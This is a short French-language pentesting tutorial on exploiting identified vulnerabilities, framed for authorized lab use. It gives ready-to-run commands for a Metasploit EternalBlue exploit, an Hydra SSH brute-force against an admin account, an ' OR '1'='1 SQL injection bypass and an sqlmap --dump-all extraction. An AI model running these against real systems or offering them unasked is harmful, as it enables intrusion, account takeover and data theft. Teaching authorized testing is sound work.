Skip to content

Exploiter les failles d'un système

Objectif

Comprendre et appliquer les méthodes d'exploitation d’un système à partir des vulnérabilités identifiées lors de la phase de scan ou de reconnaissance.

Prérequis

  • Connaissance des bases du pentesting

  • Accès à un environnement de test (lab ou machine virtuelle)

  • Connaissance des outils : Metasploit, Hydra, SQLMap


1. Exploitation des services vulnérables

Utiliser Metasploit pour exploiter une faille connue

msfconsole
search exploit windows/smb
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.X.X
exploit

Cette commande tente d'exploiter la faille SMB d’EternalBlue sur la machine ciblée.


2. Bruteforce des accès

Exemple avec SSH et Hydra

hydra -l admin -P passwords.txt ssh://192.168.X.X

Hydra teste les mots de passe listés dans passwords.txt pour l’utilisateur admin.


3. Exploitation d'une faille SQL (SQL Injection)

Test manuel dans un champ de formulaire

' OR '1'='1

Ce test permet de contourner un champ d'authentification vulnérable.

Exploitation automatique avec SQLMap

sqlmap -u "http://target.com/login.php?id=1" --dump-all

Cette commande tente d'extraire toutes les données disponibles dans la base cible.


Outils utilisés

  • Metasploit : framework d’exploitation

  • Hydra : outil de bruteforce multi-protocoles

  • SQLMap : outil d’automatisation des injections SQL


Conclusion

L’exploitation est une étape clé du pentesting permettant de valider la présence effective de vulnérabilités et d’évaluer leur impact. Elle doit toujours être réalisée dans un cadre éthique et légal, avec autorisation explicite du propriétaire du système testé.